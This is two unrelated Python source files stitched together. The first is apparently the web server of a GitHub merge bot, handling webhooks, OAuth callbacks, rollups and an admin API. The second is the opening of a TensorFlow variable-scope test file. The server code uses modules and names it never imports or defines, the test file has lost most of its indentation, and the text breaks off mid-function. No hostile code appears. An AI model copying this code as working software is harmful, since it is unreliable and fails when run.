from .action import LabelEvent
from . import utils
from .utils import lazy_debug
import github3
import jinja2
import requests
import pkg_resources
from bottle import (
get,
post,
run,
request,
redirect,
abort,
response,
)
from threading import Thread
import sys
import os
import traceback
from retrying import retry
import bottle
# Allow request bodies up to 10 MiB (bottle's default is much smaller).
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024 * 10


class G:
    # Empty namespace: a bag of mutable process-wide state (cfg, states,
    # repos, logger, ...) shared by all request handlers via `g`.
    pass


g = G()
def find_state(sha):
    """Look up the pull-request state whose merge commit is *sha*.

    Returns a ``(state, repo_label)`` pair; raises ``ValueError`` when no
    tracked pull request has that merge SHA.
    """
    matches = (
        (state, label)
        for label, states_by_num in g.states.items()
        for state in states_by_num.values()
        if state.merge_sha == sha
    )
    for hit in matches:
        return hit
    raise ValueError('Invalid SHA')
def get_repo(repo_label, repo_cfg):
    """Return the github3 repository object for *repo_label*, fetching and
    caching it on first use.

    The cache lives on the repository wrapper's ``gh`` attribute.  Do NOT
    overwrite ``g.repos[repo_label]`` itself: other handlers (e.g.
    ``queue()``) read wrapper attributes such as ``.treeclosed`` and
    ``.gh`` from that mapping, so replacing the wrapper with a raw
    github3 repo would break them.
    """
    repo = g.repos[repo_label].gh
    if not repo:
        repo = g.gh.repository(repo_cfg['owner'], repo_cfg['name'])
        # Bug fix: cache on the wrapper's .gh attribute instead of
        # replacing the wrapper object in g.repos.
        g.repos[repo_label].gh = repo
        # Sanity-check that GitHub returned the repo we asked for.
        assert repo.owner.login == repo_cfg['owner']
        assert repo.name == repo_cfg['name']
    return repo
@get('/')
def index():
    """Render the landing page listing every configured repository."""
    ordered_repos = [g.repos[label] for label in sorted(g.repos)]
    return g.tpls['index'].render(repos=ordered_repos)
@get('/results/<repo_label:path>/<pull:int>')
def result(repo_label, pull):
    # Show per-builder build results for one pull request.
    if repo_label not in g.states:
        abort(404, 'No such repository: {}'.format(repo_label))
    states = [state for state in g.states[repo_label].values()
              if state.num == pull]
    if len(states) == 0:
        return 'No build results for pull request {}'.format(pull)
    state = states[0]

    builders = []
    repo_url = 'https://github.com/{}/{}'.format(
        g.cfg['repo'][repo_label]['owner'],
        g.cfg['repo'][repo_label]['name'])
    for (builder, data) in state.build_res.items():
        # res is None while pending, truthy on success, falsy on failure.
        result = "pending"
        if data['res'] is not None:
            result = "success" if data['res'] else "failed"
        if not data['url']:
            # This happens to old try builds
            return 'No build results for pull request {}'.format(pull)
        builders.append({
            'url': data['url'],
            'result': result,
            'name': builder,
        })
    return g.tpls['build_res'].render(repo_label=repo_label,
                                      repo_url=repo_url,
                                      builders=builders, pull=pull)
@get('/queue/<repo_label:path>')
def queue(repo_label):
    # Render the merge queue for one repo, several ('a+b'), or 'all'.
    logger = g.logger.getChild('queue')
    lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))

    single_repo_closed = None
    if repo_label == 'all':
        labels = g.repos.keys()
        multiple = True
        repo_url = None
    else:
        labels = repo_label.split('+')
        multiple = len(labels) > 1
        # treeclosed >= 0 means the tree is closed below that priority.
        if repo_label in g.repos and g.repos[repo_label].treeclosed >= 0:
            single_repo_closed = g.repos[repo_label].treeclosed
        # NOTE(review): with multiple labels ('a+b') this cfg lookup uses
        # the combined string and would raise KeyError — confirm whether
        # multi-label queues are expected to have a repo_url.
        repo_url = 'https://github.com/{}/{}'.format(
            g.cfg['repo'][repo_label]['owner'],
            g.cfg['repo'][repo_label]['name'])

    states = []
    for label in labels:
        try:
            states += g.states[label].values()
        except KeyError:
            abort(404, 'No such repository: {}'.format(label))
    pull_states = sorted(states)

    rows = []
    for state in pull_states:
        # A PR is greyed out when the tree is closed for its priority.
        treeclosed = (single_repo_closed or
                      state.priority < g.repos[state.repo_label].treeclosed)
        status_ext = ''
        if state.try_:
            status_ext += ' (try)'
        if treeclosed:
            status_ext += ' [TREE CLOSED]'
        rows.append({
            'status': state.get_status(),
            'status_ext': status_ext,
            'priority': 'rollup' if state.rollup else state.priority,
            'url': 'https://github.com/{}/{}/pull/{}'.format(state.owner,
                                                             state.name,
                                                             state.num),
            'num': state.num,
            'approved_by': state.approved_by,
            'title': state.title,
            'head_ref': state.head_ref,
            'mergeable': ('yes' if state.mergeable is True else
                          'no' if state.mergeable is False else ''),
            'assignee': state.assignee,
            'repo_label': state.repo_label,
            'repo_url': 'https://github.com/{}/{}'.format(state.owner,
                                                          state.name),
            'greyed': "treeclosed" if treeclosed else "",
        })

    return g.tpls['queue'].render(
        repo_url=repo_url,
        repo_label=repo_label,
        treeclosed=single_repo_closed,
        states=rows,
        oauth_client_id=g.cfg['github']['app_client_id'],
        total=len(pull_states),
        approved=len([x for x in pull_states if x.approved_by]),
        rolled_up=len([x for x in pull_states if x.rollup]),
        failed=len([x for x in pull_states if x.status == 'failure' or
                    x.status == 'error']),
        multiple=multiple,
    )
@get('/callback')
def callback():
    # GitHub OAuth callback: exchange the code for a token, then run the
    # command ('rollup' or 'synch') encoded in the state parameter.
    logger = g.logger.getChild('callback')
    response.content_type = 'text/plain'

    code = request.query.code
    # state is a JSON blob we sent along with the authorization request.
    state = json.loads(request.query.state)
    lazy_debug(logger, lambda: 'state: {}'.format(state))
    oauth_url = 'https://github.com/login/oauth/access_token'

    try:
        res = requests.post(oauth_url, data={
            'client_id': g.cfg['github']['app_client_id'],
            'client_secret': g.cfg['github']['app_client_secret'],
            'code': code,
        })
    except Exception as ex:  # noqa
        logger.warn('/callback encountered an error '
                    'during github oauth callback')
        # probably related to https://gitlab.com/pycqa/flake8/issues/42
        lazy_debug(
            logger,
            lambda ex=ex: 'github oauth callback err: {}'.format(ex),
        )
        abort(502, 'Bad Gateway')

    # Response body is form-encoded: access_token=...&...
    args = urllib.parse.parse_qs(res.text)
    token = args['access_token'][0]

    repo_label = state['repo_label']
    repo_cfg = g.repo_cfgs[repo_label]
    repo = get_repo(repo_label, repo_cfg)

    # Act on GitHub as the user who just authorized us.
    user_gh = github3.login(token=token)

    if state['cmd'] == 'rollup':
        return rollup(user_gh, state, repo_label, repo_cfg, repo)
    elif state['cmd'] == 'synch':
        return synch(user_gh, state, repo_label, repo_cfg, repo)
    else:
        abort(400, 'Invalid command')
def rollup(user_gh, state, repo_label, repo_cfg, repo):
    # Merge all rollup-flagged (or explicitly listed) PRs into a single
    # rollup branch on the user's fork, then open one combined PR.
    user_repo = user_gh.repository(user_gh.user().login, repo.name)
    base_repo = user_gh.repository(repo.owner.login, repo.name)

    nums = state.get('nums', [])
    if nums:
        try:
            rollup_states = [g.states[repo_label][num] for num in nums]
        except KeyError as e:
            return 'Invalid PR number: {}'.format(e.args[0])
    else:
        rollup_states = [x for x in g.states[repo_label].values() if x.rollup]
    # Only approved PRs may be rolled up; keep a stable order by number.
    rollup_states = [x for x in rollup_states if x.approved_by]
    rollup_states.sort(key=lambda x: x.num)

    if not rollup_states:
        return 'No pull requests are marked as rollup'

    # All PRs in a rollup must target the same base branch as the first.
    base_ref = rollup_states[0].base_ref

    base_sha = repo.ref('heads/' + base_ref).object.sha
    # Reset the user's rollup branch to the current base head.
    utils.github_set_ref(
        user_repo,
        'heads/' + repo_cfg.get('branch', {}).get('rollup', 'rollup'),
        base_sha,
        force=True,
    )

    successes = []
    failures = []

    # NOTE(review): this loop shadows the `state` parameter; after the
    # loop, `state` refers to the LAST rollup candidate, whose base_ref
    # is then used for the combined PR — confirm this is intended.
    for state in rollup_states:
        if base_ref != state.base_ref:
            failures.append(state.num)
            continue

        merge_msg = 'Rollup merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
            state.num,
            state.head_ref,
            state.approved_by,
            state.title,
            state.body,
        )
        try:
            rollup = repo_cfg.get('branch', {}).get('rollup', 'rollup')
            user_repo.merge(rollup, state.head_sha, merge_msg)
        except github3.models.GitHubError as e:
            # 409 = merge conflict: record and continue with the rest.
            if e.code != 409:
                raise
            failures.append(state.num)
        else:
            successes.append(state.num)

    title = 'Rollup of {} pull requests'.format(len(successes))
    body = '- Successful merges: {}\n- Failed merges: {}'.format(
        ', '.join('#{}'.format(x) for x in successes),
        ', '.join('#{}'.format(x) for x in failures),
    )

    try:
        rollup = repo_cfg.get('branch', {}).get('rollup', 'rollup')
        pull = base_repo.create_pull(
            title,
            state.base_ref,
            user_repo.owner.login + ':' + rollup,
            body,
        )
    except github3.models.GitHubError as e:
        return e.response.text
    else:
        redirect(pull.html_url)
@post('/github')
def github():
    """GitHub webhook endpoint.

    Verifies the HMAC signature of the delivery, then dispatches on the
    X-Github-Event header: review comments / reviews / issue comments are
    scanned for bot commands; pull_request events keep the in-memory
    PullReqState mirror (g.states) in sync; push events invalidate
    mergeability; status and check_run events feed build results into
    report_build_res. Always answers 'OK' for accepted deliveries.
    """
    logger = g.logger.getChild('github')

    response.content_type = 'text/plain'

    payload = request.body.read()
    info = request.json

    lazy_debug(logger, lambda: 'info: {}'.format(utils.remove_url_keys_from_json(info)))  # noqa

    owner_info = info['repository']['owner']
    # Organization payloads carry 'name'; user payloads carry 'login'.
    owner = owner_info.get('login') or owner_info['name']
    repo_label = g.repo_labels[owner, info['repository']['name']]
    repo_cfg = g.repo_cfgs[repo_label]

    hmac_method, hmac_sig = request.headers['X-Hub-Signature'].split('=')
    expected_sig = hmac.new(
        repo_cfg['github']['secret'].encode('utf-8'),
        payload,
        hmac_method,
    ).hexdigest()
    # Security fix: constant-time comparison instead of `!=`, so the check
    # does not leak signature prefixes through response timing.
    if not hmac.compare_digest(hmac_sig, expected_sig):
        abort(400, 'Invalid signature')

    event_type = request.headers['X-Github-Event']

    if event_type == 'pull_request_review_comment':
        action = info['action']
        original_commit_id = info['comment']['original_commit_id']
        head_sha = info['pull_request']['head']['sha']

        # Only act on fresh comments that refer to the current head.
        if action == 'created' and original_commit_id == head_sha:
            pull_num = info['pull_request']['number']
            body = info['comment']['body']
            username = info['sender']['login']

            state = g.states[repo_label].get(pull_num)
            if state:
                state.title = info['pull_request']['title']
                state.body = info['pull_request']['body']

                if parse_commands(
                    g.cfg,
                    body,
                    username,
                    repo_cfg,
                    state,
                    g.my_username,
                    g.db,
                    g.states,
                    realtime=True,
                    sha=original_commit_id,
                ):
                    state.save()

                    g.queue_handler()

    elif event_type == 'pull_request_review':
        action = info['action']
        commit_id = info['review']['commit_id']
        head_sha = info['pull_request']['head']['sha']

        if action == 'submitted' and commit_id == head_sha:
            pull_num = info['pull_request']['number']
            body = info['review']['body']
            username = info['sender']['login']

            state = g.states[repo_label].get(pull_num)
            if state:
                state.title = info['pull_request']['title']
                state.body = info['pull_request']['body']

                if parse_commands(
                    g.cfg,
                    body,
                    username,
                    repo_cfg,
                    state,
                    g.my_username,
                    g.db,
                    g.states,
                    realtime=True,
                    sha=commit_id,
                ):
                    state.save()

                    g.queue_handler()

    elif event_type == 'pull_request':
        action = info['action']
        pull_num = info['number']
        head_sha = info['pull_request']['head']['sha']

        if action == 'synchronize':
            state = g.states[repo_label][pull_num]
            state.head_advanced(head_sha)
            state.save()

        elif action in ['opened', 'reopened']:
            state = PullReqState(pull_num, head_sha, '', g.db, repo_label,
                                 g.mergeable_que, g.gh,
                                 info['repository']['owner']['login'],
                                 info['repository']['name'],
                                 repo_cfg.get('labels', {}),
                                 g.repos)
            state.title = info['pull_request']['title']
            state.body = info['pull_request']['body']
            state.head_ref = info['pull_request']['head']['repo']['owner']['login'] + ':' + info['pull_request']['head']['ref']  # noqa
            state.base_ref = info['pull_request']['base']['ref']
            state.set_mergeable(info['pull_request']['mergeable'])
            state.assignee = (info['pull_request']['assignee']['login'] if
                              info['pull_request']['assignee'] else '')

            found = False

            if action == 'reopened':
                # FIXME: Review comments are ignored here
                for c in state.get_repo().issue(pull_num).iter_comments():
                    found = parse_commands(
                        g.cfg,
                        c.body,
                        c.user.login,
                        repo_cfg,
                        state,
                        g.my_username,
                        g.db,
                        g.states,
                    ) or found

                # Restore the previously reported homu status, if any.
                # Bug fix: the loop variable was named `info`, shadowing the
                # webhook payload; renamed to avoid the latent clobber.
                status = ''
                for status_info in utils.github_iter_statuses(
                        state.get_repo(), state.head_sha):
                    if status_info.context == 'homu':
                        status = status_info.state
                        break

                state.set_status(status)

            state.save()

            g.states[repo_label][pull_num] = state
            if found:
                g.queue_handler()

        elif action == 'closed':
            state = g.states[repo_label][pull_num]
            if hasattr(state, 'fake_merge_sha'):
                def inner():
                    utils.github_set_ref(
                        state.get_repo(),
                        'heads/' + state.base_ref,
                        state.merge_sha,
                        force=True,
                    )

                def fail(err):
                    state.add_comment(':boom: Failed to recover from the '
                                      'artificial commit. See {} for details.'
                                      ' ({})'.format(state.fake_merge_sha,
                                                     err))

                utils.retry_until(inner, fail, state)

            # Forget the PR entirely: in-memory state and all DB rows.
            del g.states[repo_label][pull_num]

            db_query(g.db, 'DELETE FROM pull WHERE repo = ? AND num = ?',
                     [repo_label, pull_num])
            db_query(g.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?',
                     [repo_label, pull_num])
            db_query(g.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?',
                     [repo_label, pull_num])

            g.queue_handler()

        elif action in ['assigned', 'unassigned']:
            state = g.states[repo_label][pull_num]
            state.assignee = (info['pull_request']['assignee']['login'] if
                              info['pull_request']['assignee'] else '')
            state.save()

        else:
            lazy_debug(logger, lambda: 'Invalid pull_request action: {}'.format(action))  # noqa

    elif event_type == 'push':
        ref = info['ref'][len('refs/heads/'):]

        for state in list(g.states[repo_label].values()):
            if state.base_ref == ref:
                # Base branch moved: mergeability must be recomputed.
                state.set_mergeable(None, cause={
                    'sha': info['head_commit']['id'],
                    'title': info['head_commit']['message'].splitlines()[0],
                })

            if state.head_sha == info['before']:
                if state.status:
                    state.change_labels(LabelEvent.PUSHED)
                state.head_advanced(info['after'])

                state.save()

    elif event_type == 'issue_comment':
        body = info['comment']['body']
        username = info['comment']['user']['login']
        pull_num = info['issue']['number']

        state = g.states[repo_label].get(pull_num)

        # 'pull_request' key distinguishes PR comments from plain issues.
        if 'pull_request' in info['issue'] and state:
            state.title = info['issue']['title']
            state.body = info['issue']['body']

            if parse_commands(
                g.cfg,
                body,
                username,
                repo_cfg,
                state,
                g.my_username,
                g.db,
                g.states,
                realtime=True,
            ):
                state.save()

                g.queue_handler()

    elif event_type == 'status':
        try:
            state, repo_label = find_state(info['sha'])
        except ValueError:
            return 'OK'

        # Map the status context back to a configured status name.
        status_name = ""
        if 'status' in repo_cfg:
            for name, value in repo_cfg['status'].items():
                if 'context' in value and value['context'] == info['context']:
                    status_name = name
        if status_name == "":
            return 'OK'

        if info['state'] == 'pending':
            return 'OK'

        # Ignore statuses reported against the base branch itself.
        for row in info['branches']:
            if row['name'] == state.base_ref:
                return 'OK'

        report_build_res(info['state'] == 'success', info['target_url'],
                         'status-' + status_name, state, logger, repo_cfg)

    elif event_type == 'check_run':
        try:
            state, repo_label = find_state(info['check_run']['head_sha'])
        except ValueError:
            return 'OK'

        # Map the check run name back to a configured checks entry.
        current_run_name = info['check_run']['name']
        checks_name = None
        if 'checks' in repo_cfg:
            for name, value in repo_cfg['checks'].items():
                if 'name' in value and value['name'] == current_run_name:
                    checks_name = name
        if checks_name is None:
            return 'OK'

        if info['check_run']['status'] != 'completed':
            return 'OK'

        if info['check_run']['conclusion'] is None:
            return 'OK'

        report_build_res(
            info['check_run']['conclusion'] == 'success',
            info['check_run']['details_url'],
            'checks-' + checks_name,
            state, logger, repo_cfg,
        )

    return 'OK'
def report_build_res(succ, url, builder, state, logger, repo_cfg):
    """Record one builder's result for a PR and act when the set completes.

    succ: whether this builder passed. When every builder in
    state.build_res has passed, the PR status becomes 'success'; approved
    non-try PRs are then fast-forwarded onto their base branch, try runs
    just get a comment. A failure (while the PR is still pending) marks it
    'failure'. Always pokes the queue handler at the end.
    """
    lazy_debug(logger,
               lambda: 'build result {}: builder = {}, succ = {}, current build_res = {}'  # noqa
               .format(state, builder, succ,
                       state.build_res_summary()))

    state.set_build_res(builder, succ, url)

    if succ:
        # Only act once ALL builders have reported success.
        if all(x['res'] for x in state.build_res.values()):
            state.set_status('success')
            desc = 'Test successful'
            utils.github_create_status(state.get_repo(), state.head_sha,
                                       'success', url, desc, context='homu')

            urls = ', '.join('[{}]({})'.format(builder, x['url']) for builder, x in sorted(state.build_res.items()))  # noqa
            test_comment = ':sunny: {} - {}'.format(desc, urls)

            if state.approved_by and not state.try_:
                # Approved merge: push the tested merge commit to the base.
                comment = (test_comment + '\n' +
                           'Approved by: {}\nPushing {} to {}...'
                           ).format(state.approved_by, state.merge_sha,
                                    state.base_ref)
                state.add_comment(comment)
                state.change_labels(LabelEvent.SUCCEED)
                try:
                    try:
                        utils.github_set_ref(state.get_repo(), 'heads/' +
                                             state.base_ref, state.merge_sha)
                    except github3.models.GitHubError:
                        # Branch protection can require a 'homu' status on
                        # the merge commit itself; set it and retry once.
                        utils.github_create_status(
                            state.get_repo(),
                            state.merge_sha,
                            'success', '',
                            'Branch protection bypassed',
                            context='homu')
                        utils.github_set_ref(state.get_repo(), 'heads/' +
                                             state.base_ref, state.merge_sha)

                    state.fake_merge(repo_cfg)
                except github3.models.GitHubError as e:
                    state.set_status('error')
                    desc = ('Test was successful, but fast-forwarding failed:'
                            ' {}'.format(e))
                    utils.github_create_status(state.get_repo(),
                                               state.head_sha, 'error', url,
                                               desc, context='homu')

                    state.add_comment(':eyes: ' + desc)
            else:
                # Try build (or unapproved): report only, no push.
                comment = (test_comment + '\n' +
                           'State: approved={} try={}'
                           ).format(state.approved_by, state.try_)
                state.add_comment(comment)
                state.change_labels(LabelEvent.TRY_SUCCEED)
    else:
        # Only the first failure flips the status; later ones are ignored.
        if state.status == 'pending':
            state.set_status('failure')
            desc = 'Test failed'
            utils.github_create_status(state.get_repo(), state.head_sha,
                                       'failure', url, desc, context='homu')

            state.add_comment(':broken_heart: {} - [{}]({})'.format(desc,
                                                                    builder,
                                                                    url))
            event = LabelEvent.TRY_FAILED if state.try_ else LabelEvent.FAILED
            state.change_labels(event)

    g.queue_handler()
@post('/buildbot')
def buildbot():
    """Buildbot webhook endpoint.

    Processes the batched 'packets' form field: buildFinished events are
    validated against the per-repo secret and forwarded to
    report_build_res (with special handling for builds homu itself
    interrupted); buildStarted events record a pending result and free the
    buildbot slot for the revision.
    """
    logger = g.logger.getChild('buildbot')

    response.content_type = 'text/plain'

    for row in json.loads(request.forms.packets):
        if row['event'] == 'buildFinished':
            info = row['payload']['build']
            lazy_debug(logger, lambda: 'info: {}'.format(info))
            # properties is a list of [name, value, source] triples.
            props = dict(x[:2] for x in info['properties'])

            if 'retry' in info['text']:
                continue

            if not props['revision']:
                continue

            try:
                state, repo_label = find_state(props['revision'])
            except ValueError:
                lazy_debug(logger,
                           lambda: 'Invalid commit ID from Buildbot: {}'.format(props['revision']))  # noqa
                continue

            lazy_debug(logger, lambda: 'state: {}, {}'.format(state, state.build_res_summary()))  # noqa

            if info['builderName'] not in state.build_res:
                lazy_debug(logger,
                           lambda: 'Invalid builder from Buildbot: {}'.format(info['builderName']))  # noqa
                continue

            repo_cfg = g.repo_cfgs[repo_label]

            if request.forms.secret != repo_cfg['buildbot']['secret']:
                abort(400, 'Invalid secret')

            build_succ = 'successful' in info['text'] or info['results'] == 0

            url = '{}/builders/{}/builds/{}'.format(
                repo_cfg['buildbot']['url'],
                info['builderName'],
                props['buildnumber'],
            )

            if 'interrupted' in info['text']:
                # Find the interrupted step and fetch its log to see whether
                # homu itself interrupted the build (to reprioritize).
                step_name = ''
                for step in reversed(info['steps']):
                    if 'interrupted' in step.get('text', []):
                        step_name = step['name']
                        break

                if step_name:
                    try:
                        url = ('{}/builders/{}/builds/{}/steps/{}/logs/interrupt'  # noqa
                               ).format(repo_cfg['buildbot']['url'],
                                        info['builderName'],
                                        props['buildnumber'],
                                        step_name,)
                        res = requests.get(url)
                    except Exception as ex:  # noqa
                        logger.warn('/buildbot encountered an error during '
                                    'github logs request')
                        # ex bound as a default so the lambda sees it even
                        # after the except block's variable is cleared.
                        lazy_debug(
                            logger,
                            lambda ex=ex: 'buildbot logs err: {}'.format(ex),
                        )
                        abort(502, 'Bad Gateway')

                    mat = INTERRUPTED_BY_HOMU_RE.search(res.text)
                    if mat:
                        # Deduplicate: only react once per interrupt token.
                        interrupt_token = mat.group(1)
                        if getattr(state, 'interrupt_token',
                                   '') != interrupt_token:
                            state.interrupt_token = interrupt_token

                            if state.status == 'pending':
                                state.set_status('')

                                desc = (':snowman: The build was interrupted '
                                        'to prioritize another pull request.')
                                state.add_comment(desc)
                                state.change_labels(LabelEvent.INTERRUPTED)
                                utils.github_create_status(state.get_repo(),
                                                           state.head_sha,
                                                           'error', url,
                                                           desc,
                                                           context='homu')

                                g.queue_handler()

                        continue
                else:
                    logger.error('Corrupt payload from Buildbot')

            report_build_res(build_succ, url, info['builderName'],
                             state, logger, repo_cfg)

        elif row['event'] == 'buildStarted':
            info = row['payload']['build']
            lazy_debug(logger, lambda: 'info: {}'.format(info))
            props = dict(x[:2] for x in info['properties'])

            if not props['revision']:
                continue

            try:
                state, repo_label = find_state(props['revision'])
            except ValueError:
                pass
            else:
                if info['builderName'] in state.build_res:
                    repo_cfg = g.repo_cfgs[repo_label]

                    if request.forms.secret != repo_cfg['buildbot']['secret']:
                        abort(400, 'Invalid secret')

                    url = '{}/builders/{}/builds/{}'.format(
                        repo_cfg['buildbot']['url'],
                        info['builderName'],
                        props['buildnumber'],
                    )
                    # None marks the builder as in-progress.
                    state.set_build_res(info['builderName'], None, url)

            # Free the slot so the next queued revision can start.
            if g.buildbot_slots[0] == props['revision']:
                g.buildbot_slots[0] = ''

                g.queue_handler()

    return 'OK'
def synch(user_gh, state, repo_label, repo_cfg, repo):
    """Kick off a background resynchronization of a single repository.

    Only collaborators of the repository may trigger a sync.
    """
    if not repo.is_collaborator(user_gh.user().login):
        abort(400, 'You are not a collaborator')

    sync_args = [repo_label, g.cfg, repo_cfg, g.logger, g.gh, g.states,
                 g.repos, g.db, g.mergeable_que, g.my_username, g.repo_labels]
    Thread(target=synchronize, args=sync_args).start()

    return 'Synchronizing {}...'.format(repo_label)
def synch_all():
    """Resynchronize every configured repository, one after another."""

    @retry(wait_exponential_multiplier=1000, wait_exponential_max=600000)
    def sync_repo(repo_label, g):
        # Each repo is retried with exponential backoff (1s doubling,
        # capped at 10 minutes); failures are logged before re-raising.
        try:
            synchronize(repo_label, g.cfg, g.repo_cfgs[repo_label], g.logger,
                        g.gh, g.states, g.repos, g.db, g.mergeable_que,
                        g.my_username, g.repo_labels)
        except Exception:
            print('* Error while synchronizing {}'.format(repo_label))
            traceback.print_exc()
            raise

    for label in g.repos:
        sync_repo(label, g)

    print('* Done synchronizing all')
@post('/admin')
def admin():
    """Secret-guarded JSON admin API: add/remove/edit repos or resync all."""
    req = request.json
    if req['secret'] != g.cfg['web']['secret']:
        return 'Authentication failure'

    cmd = req['cmd']

    if cmd == 'repo_new':
        repo_label = req['repo_label']
        repo_cfg = req['repo_cfg']

        # Register empty in-memory structures, then populate in background.
        g.states[repo_label] = {}
        g.repos[repo_label] = None
        g.repo_cfgs[repo_label] = repo_cfg
        g.repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label

        Thread(target=synchronize,
               args=[repo_label, g.cfg, repo_cfg, g.logger, g.gh, g.states,
                     g.repos, g.db, g.mergeable_que, g.my_username,
                     g.repo_labels]).start()
        return 'OK'

    if cmd == 'repo_del':
        repo_label = req['repo_label']
        repo_cfg = g.repo_cfgs[repo_label]

        # Purge persisted rows, then drop every in-memory registration.
        db_query(g.db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
        db_query(g.db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
        db_query(g.db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])

        del g.states[repo_label]
        del g.repos[repo_label]
        del g.repo_cfgs[repo_label]
        del g.repo_labels[repo_cfg['owner'], repo_cfg['name']]
        return 'OK'

    if cmd == 'repo_edit':
        repo_label = req['repo_label']
        repo_cfg = req['repo_cfg']

        # Owner/name identify the repo and may not change via edit.
        assert repo_cfg['owner'] == g.repo_cfgs[repo_label]['owner']
        assert repo_cfg['name'] == g.repo_cfgs[repo_label]['name']

        g.repo_cfgs[repo_label] = repo_cfg
        return 'OK'

    if cmd == 'sync_all':
        Thread(target=synch_all).start()
        return 'OK'

    return 'Unrecognized command'
def start(cfg, states, queue_handler, repo_cfgs, repos, logger,
          buildbot_slots, my_username, db, repo_labels, mergeable_que, gh):
    """Install the shared server globals and run the web server (blocks)."""
    template_env = jinja2.Environment(
        loader=jinja2.FileSystemLoader(pkg_resources.resource_filename(__name__, 'html')),  # noqa
        autoescape=True,
    )
    tpls = {
        name: template_env.get_template('{}.html'.format(name))
        for name in ('index', 'queue', 'build_res')
    }

    # Everything the request handlers need lives on the module-global `g`.
    g.cfg = cfg
    g.states = states
    g.queue_handler = queue_handler
    g.repo_cfgs = repo_cfgs
    g.repos = repos
    g.logger = logger.getChild('server')
    g.buildbot_slots = buildbot_slots
    g.tpls = tpls
    g.my_username = my_username
    g.db = db
    g.repo_labels = repo_labels
    g.mergeable_que = mergeable_que
    g.gh = gh

    # Synchronize all PR data on startup
    if cfg['web'].get('sync_on_start', False):
        Thread(target=synch_all).start()

    try:
        run(host=cfg['web'].get('host', '0.0.0.0'),
            port=cfg['web']['port'],
            server='waitress')
    except OSError as e:
        print(e, file=sys.stderr)
        os._exit(1)
|
variable_scope_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes()
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
  def testNameExists(self):
    """Check create-vs-get enforcement via the reuse flag in the store."""
    vs = variable_scope._get_default_variable_store()
    # No check by default, so we can both create and get existing names.
    v = vs.get_variable("v", [1])
    v1 = vs.get_variable("v", [1])
    self.assertEqual(v, v1)
    # When reuse is False, we fail when variables are already there.
    vs.get_variable("w", [1], reuse=False)  # That's ok.
    with self.assertRaises(ValueError):
      vs.get_variable("v", [1], reuse=False)  # That fails.
    # When reuse is True, we fail when variables are new.
    vs.get_variable("v", [1], reuse=True)  # That's ok.
    with self.assertRaises(ValueError):
      vs.get_variable("u", [1], reuse=True)  # That fails.
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
  @test_util.run_in_graph_and_eager_modes()
  def testVarScopeInitializer(self):
    """A scope-level initializer applies on creation and on scope re-entry."""
    init = init_ops.constant_initializer(0.3)
    with variable_scope.variable_scope("tower0") as tower:
      with variable_scope.variable_scope("foo", initializer=init):
        v = variable_scope.get_variable("v", [])
        self.evaluate(variables_lib.variables_initializer([v]))
        self.assertAllClose(self.evaluate(v.value()), 0.3)
      # Re-entering via the captured scope object still honors the argument.
      with variable_scope.variable_scope(tower, initializer=init):
        w = variable_scope.get_variable("w", [])
        self.evaluate(variables_lib.variables_initializer([w]))
        self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes()
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
def testStringDefaultInitializer(self):
with self.test_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(v.eval()), b"")
@test_util.run_in_graph_and_eager_modes()
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
